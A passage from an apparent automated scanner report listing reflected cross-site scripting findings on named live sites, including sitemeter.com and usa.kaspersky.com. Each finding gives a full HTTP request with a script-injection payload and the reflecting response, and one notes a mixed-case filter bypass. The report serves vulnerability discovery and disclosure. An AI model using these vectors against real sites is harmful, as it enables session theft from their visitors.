mboxFactories.get('default').get('mbx_company_landing6210f<script>alert(1)</script>d253288866b',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1303045152447-372951.17");
4.45. http://s25.sitemeter.com/js/counter.asp [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s25.sitemeter.com
Path:   /js/counter.asp

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18a21'%3balert(1)//a3344cc69fd was submitted in the site parameter. This input was echoed as 18a21';alert(1)//a3344cc69fd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/counter.asp?site=s25hadashot18a21'%3balert(1)//a3344cc69fd HTTP/1.1
Host: s25.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://www.hadash-hot.co.il/login.php?return=/submit.php?69123%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Efab6770260=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:35:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7320
Content-Type: application/x-javascript
Expires: Sun, 17 Apr 2011 14:45:04 GMT
Set-Cookie: IP=173%2E193%2E214%2E243; path=/js
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServe
...[SNIP]...
.addEventListener(sEvent, func, false);
       else
           if (obj.attachEvent)
            obj.attachEvent( "on"+sEvent, func );
           else
               return false;
       return true;
   }

}

SiteMeter.init('s25hadashot18a21';alert(1)//a3344cc69fd', 's25.sitemeter.com', '');

var g_sLastCodeName = 's25hadashot18a21';alert(1)//a3344cc69fd';
// ]]>
...[SNIP]...
4.46. http://s25.sitemeter.com/js/counter.js [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s25.sitemeter.com
Path:   /js/counter.js

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 39f79'%3balert(1)//80af3977918 was submitted in the site parameter. This input was echoed as 39f79';alert(1)//80af3977918 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /js/counter.js?site=s25hadashot39f79'%3balert(1)//80af3977918 HTTP/1.1
Host: s25.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://www.hadash-hot.co.il/login.php?return=/submit.php?69123%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Efab6770260=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:35:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7320
Content-Type: application/x-javascript
Expires: Sun, 17 Apr 2011 14:45:05 GMT
Set-Cookie: IP=173%2E193%2E214%2E243; path=/js
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServe
...[SNIP]...
.addEventListener(sEvent, func, false);
       else
           if (obj.attachEvent)
            obj.attachEvent( "on"+sEvent, func );
           else
               return false;
       return true;
   }

}

SiteMeter.init('s25hadashot39f79';alert(1)//80af3977918', 's25.sitemeter.com', '');

var g_sLastCodeName = 's25hadashot39f79';alert(1)//80af3977918';
// ]]>
...[SNIP]...
4.47. http://theautomaster.com/smartbrowse/ajax/new.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://theautomaster.com
Path:   /smartbrowse/ajax/new.htm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab6c3"><script>alert(1)</script>d3cbc0a7a50 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /smartbrowseab6c3"><script>alert(1)</script>d3cbc0a7a50/ajax/new.htm?detect=false&reset=InventoryListing&showYear=true&showMake=true&showModel=true&showAllModels=true&showTrim=&showBodyStyle=true&showMileage=true&showPrice=true&showLocation=false&showHighywayMpgs=false HTTP/1.1
Host: theautomaster.com
Proxy-Connection: keep-alive
Referer: http://theautomaster.com/index.htm
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=5f434b3b0a0a002d004d9ebf7ccb20d0; JSESSIONID=10ue49uec8ctq; lbpoolmember=1711345162.40475.0000; ddcpoolid=CmsPoolE

Response

HTTP/1.1 404 Not Found
Date: Sat, 16 Apr 2011 17:04:30 GMT
Server: Jetty/5.1.1 (Linux/2.6.18-128.7.1.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 14533

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms25.dealer.ddc p7070 -->

   <title>The Automaster of Shelburne, VT</title>
   <meta http-equiv="Content-Type" content="text/ht
...[SNIP]...
<img src="http://hits.dealer.com/clear.gif?&amp;4=0&amp;5=0&amp;10=&amp;20=theautomaster.com&amp;21=/smartbrowseab6c3"><script>alert(1)</script>d3cbc0a7a50/ajax/new.htm&amp;50=5f434b3b0a0a002d004d9ebf7ccb20d0&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&amp;81=&amp;82=&amp;83=&amp;62-
...[SNIP]...
4.48. http://theautomaster.com/smartbrowse/ajax/new.htm [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://theautomaster.com
Path:   /smartbrowse/ajax/new.htm

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e37f"><script>alert(1)</script>2357d3fddc1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /smartbrowse/ajax1e37f"><script>alert(1)</script>2357d3fddc1/new.htm?detect=false&reset=InventoryListing&showYear=true&showMake=true&showModel=true&showAllModels=true&showTrim=&showBodyStyle=true&showMileage=true&showPrice=true&showLocation=false&showHighywayMpgs=false HTTP/1.1
Host: theautomaster.com
Proxy-Connection: keep-alive
Referer: http://theautomaster.com/index.htm
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=5f434b3b0a0a002d004d9ebf7ccb20d0; JSESSIONID=10ue49uec8ctq; lbpoolmember=1711345162.40475.0000; ddcpoolid=CmsPoolE

Response

HTTP/1.1 404 Not Found
Date: Sat, 16 Apr 2011 17:04:42 GMT
Server: Jetty/5.1.1 (Linux/2.6.18-128.7.1.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 14533

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms25.dealer.ddc p7070 -->

   <title>The Automaster of Shelburne, VT</title>
   <meta http-equiv="Content-Type" content="text/ht
...[SNIP]...
<img src="http://hits.dealer.com/clear.gif?&amp;4=0&amp;5=0&amp;10=&amp;20=theautomaster.com&amp;21=/smartbrowse/ajax1e37f"><script>alert(1)</script>2357d3fddc1/new.htm&amp;50=5f434b3b0a0a002d004d9ebf7ccb20d0&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&amp;81=&amp;82=&amp;83=&amp;62-0=10&
...[SNIP]...
4.49. http://theautomaster.com/used-inventory/index.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://theautomaster.com
Path:   /used-inventory/index.htm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4380"><script>alert(1)</script>7f92519afdd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /used-inventoryf4380"><script>alert(1)</script>7f92519afdd/index.htm?reset=InventoryListing HTTP/1.1
Host: theautomaster.com
Proxy-Connection: keep-alive
Referer: http://theautomaster.com/index.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=111725121.1303003248.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/15; ssoid=610cf6690a0a002d004d9ebff580a7e7; JSESSIONID=1sdotl64whyrk; lbpoolmember=1711345162.40475.0000; ddcpoolid=CmsPoolE; __utma=111725121.1506997093.1302973362.1302973362.1303003248.2; __utmc=111725121; __utmb=111725121.14.5.1303003427103

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 01:41:05 GMT
Server: Jetty/5.1.1 (Linux/2.6.18-128.7.1.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 14691

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms25.dealer.ddc p7070 -->

   <title>The Automaster of Shelburne, VT</title>
   <meta http-equiv="Content-Type" content="text/ht
...[SNIP]...
<img src="http://hits.dealer.com/clear.gif?&amp;4=0&amp;5=0&amp;10=http://www.google.com/search?hl=en&q=7ddc8'-alert(document.cookie)-'4ac342c68e7&amp;20=theautomaster.com&amp;21=/used-inventoryf4380"><script>alert(1)</script>7f92519afdd/index.htm&amp;50=610cf6690a0a002d004d9ebff580a7e7&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&amp;81=&amp;82=&amp;83=&amp;62-0=1
...[SNIP]...
4.50. http://ts.istrack.com/trackingAPI.js [vti parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ts.istrack.com
Path:   /trackingAPI.js

Issue detail

The value of the vti request parameter is copied into the HTML document as plain text between tags. The payload 84994<script>alert(1)</script>651019c713b was submitted in the vti parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /trackingAPI.js?ai=1/b7YsF5/LZw+m6HdoJfHSWrtAPLOT1z&evt=20&ri=54028&ii=40200&vti=1c4WFQoBC2cAABF-Y28AAAAAACGeq@x@J8zrRG84994<script>alert(1)</script>651019c713b HTTP/1.1
Host: ts.istrack.com
Proxy-Connection: keep-alive
Referer: http://www.bitdefender.com/solutions/antivirus.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 12:59:29 GMT
Server: Apache
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Length: 114
Connection: close
Content-Type: text/javascript; charset=utf-8

ISVT_setCookie('isvt_visitor', '1c4WFQoBC2cAABF-Y28AAAAAACGeq@x@J8zrRG84994<script>alert(1)</script>651019c713b');
4.51. http://usa.kaspersky.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 420aa"><script>alert(1)</script>7e822a04924 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?420aa"><script>alert(1)</script>7e822a04924=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|26D5721C85078BD0-60000103C002991F[CE]; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA; s_nr=1303045178067-New; __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.2.10.1303044891; evar7=kav_rescue_10.iso; gpv_pageName=Downloads;

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 13:04:59 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303045499"
Content-Type: text/html; charset=utf-8
Content-Length: 41098
Date: Sun, 17 Apr 2011 13:05:02 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/?420aa"><script>alert(1)</script>7e822a04924=1" />
...[SNIP]...
4.52. http://usa.kaspersky.com/downloads [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 111b7"-alert(1)-"57da2f5aecf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads111b7"-alert(1)-"57da2f5aecf HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://www.kaspersky.com/virusscanner
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.1.10.1303044891; evar7=kav_rescue_10.iso; s_nr=1303045169558-New; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 13:00:01 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303045201"
Content-Type: text/html; charset=utf-8
Content-Length: 30202
Date: Sun, 17 Apr 2011 13:00:04 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/downloads111b7"-alert(1)-"57da2f5aecf";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...
4.53. http://usa.kaspersky.com/downloads [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85cf9"><ScRiPt>alert(1)</ScRiPt>2d924d33a07 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Request

GET /downloads85cf9"><ScRiPt>alert(1)</ScRiPt>2d924d33a07 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://www.kaspersky.com/virusscanner
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.1.10.1303044891; evar7=kav_rescue_10.iso; s_nr=1303045169558-New; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 12:59:56 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303045196"
Content-Type: text/html; charset=utf-8
Content-Length: 30299
Date: Sun, 17 Apr 2011 12:59:58 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/downloads85cf9"><ScRiPt>alert(1)</ScRiPt>2d924d33a07" />
...[SNIP]...
4.54. http://usa.kaspersky.com/downloads [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 213ed"><script>alert(1)</script>2b51f9931de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads?213ed"><script>alert(1)</script>2b51f9931de=1 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://www.kaspersky.com/virusscanner
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.1.10.1303044891; evar7=kav_rescue_10.iso; s_nr=1303045169558-New; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 12:59:46 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303045186"
Content-Type: text/html; charset=utf-8
Content-Length: 53136
Date: Sun, 17 Apr 2011 12:59:48 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/downloads?213ed"><script>alert(1)</script>2b51f9931de=1" />
...[SNIP]...
4.55. http://usa.kaspersky.com/index.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /index.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b646"><script>alert(1)</script>ae9adfd699b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.html6b646"><script>alert(1)</script>ae9adfd699b HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|26D5721C85078BD0-60000103C002991F[CE]; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA; s_nr=1303045178067-New; __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.2.10.1303044891; evar7=kav_rescue_10.iso; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 13:05:17 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303045517"
Content-Type: text/html; charset=utf-8
Content-Length: 30304
Date: Sun, 17 Apr 2011 13:05:19 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/index.html6b646"><script>alert(1)</script>ae9adfd699b" />
...[SNIP]...
4.56. http://usa.kaspersky.com/index.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /index.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 32ac5"-alert(1)-"a94f7d736ee was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.html32ac5"-alert(1)-"a94f7d736ee HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|26D5721C85078BD0-60000103C002991F[CE]; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA; s_nr=1303045178067-New; __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.2.10.1303044891; evar7=kav_rescue_10.iso; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 13:05:22 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303045522"
Content-Type: text/html; charset=utf-8
Content-Length: 30208
Date: Sun, 17 Apr 2011 13:05:23 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
) { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/index.html32ac5"-alert(1)-"a94f7d736ee";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...
4.57. http://usa.kaspersky.com/index.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 487ba"><script>alert(1)</script>aa7cd075570 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.html?487ba"><script>alert(1)</script>aa7cd075570=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|26D5721C85078BD0-60000103C002991F[CE]; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA; s_nr=1303045178067-New; __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.2.10.1303044891; evar7=kav_rescue_10.iso; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 13:05:08 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303045508"
Content-Type: text/html; charset=utf-8
Content-Length: 34850
